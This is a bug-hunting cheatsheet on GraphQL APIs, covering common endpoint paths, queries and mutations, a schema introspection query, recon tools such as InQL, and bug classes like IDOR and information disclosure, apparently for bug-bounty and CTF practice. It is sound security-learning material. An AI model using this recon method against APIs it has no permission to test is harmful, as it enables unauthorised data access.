GraphQL cheatsheet

References:

• Finding Your Next Bug: GraphQL
• https://www.youtube.com/results?search_query=graphql+hacking

What GraphQL Is

• Query language for APIs similar to SQL
• Usually exposed through a single endpoint where clients send structured queries
• Client defines exactly what data fields to return
• Common in modern applications

Key characteristics

• Flexible queries
• Structured schema
• Client controlled responses
• Graph based data relationships

Some common endpoints used in GraphQL implementations:

• /v1/*
• /v2/*
• /beta/*
• /graph
• /gql
• /graphql/console
• /graphql
• /graphql/console
• /graphql.php
• /graphiql
• /graphiql.php

Where to find GraphQL?

• Same place you find other APIs
• Tends to be more common with newer applications
  • Yahoo, Shopify, HackerOne all useGraphQL
• GraphQL is usually located at specific endpoints
  • gql, graphql, graphiql graphql/console
• But look out for requests/responses referencing: queries, mutations

How does Graph QL work?

• GraphQL implements a graph structure as the database
• There are queries and mutations
  • Queries fetch data
  • Mutations allow the data to be edited
• Fragments allow for easily saved lists of fields
• Metafields allow for the inspection of query or mutation information

Graph Structure

• Usually we represent data as tables, spreadsheets of data
• But we often link 2 different tables together using IDs
• Now we can still think of it in flat structures
• But the natural form of this data is a graph!

Queries

• Queries in GraphQL are written to be flexible
• You can request any field easily, including related entities on the graph, and then a field associated with that entity
• Written as functions
• Can return a single result or several
• Can also include arguments
• Or data manipulation
• Very structured

An example query to show the whole schema:

query Introspection {
	__schema{
		types{
			name
		}
	}
}

Mutations

While queries fetch data, a mutation edits it

• Can be an edit with assigned variables or deleting
• Can also fetch data after modifying it

Edges & nodes

• node - object containing data
• edge - connector of 2 nodes

Fragments and Metaqueries

• Fragments allow you to decide a list of fields and request multiple queries use the same list
• Used for comparisons
• Metafields allow you to inspect the API, typename returns the typname

• Extremely important for Introspection queries!

• Introspection: how to find all the mutations and queries
  • Api will tell you
  • GRAPHQL VOYAGER-tool to visualize output (fragments??)

How to do more traditional recon:

• Even if introspection is turned off we can still do recon to find API endpoints
• Click buttons, figure out the structure of queries, replace likely entity names or just test visible gql endpoints
• Keep an eye out for:
  • Any documentation, this is likely to list gql endpoints
  • Errors gql might even tell you what

Useful applications for recon:

• GraphQL IDE
• Altair-GraphQL IDE (Similar to Postman in design)
• InQL-Burp addon and scanner
• GraphQL Map
• graphql-path-enum: This tool walks an introspection query result to show how two entities are related

Common GraphQL Bugs:

• information disclosure
• IDORS
• Bypassing client restrictions (eg WAF for XSS)
• What makes Gql special? The syntax)
  • The bugs are the same

How to Hack graphql API

Your approach should be:

• Try to introspect to find the GraphQL queries and mutations
• if introspection is turned off, go for a traditional recon approach, push buttons, use wordlists
• Identify the business logic of each endpoint
• Craft queries to check for:
  • Information disclosure
  • IDORS
  • Permission bypasses
• Remember the hard part of GraphQL bug hunting is the SYNTAX
• A great place to practice is the h102 CTF https://ctf.hacker101.com/auth/login
• Graphql documentation: https://graphql.org/learn/ documentation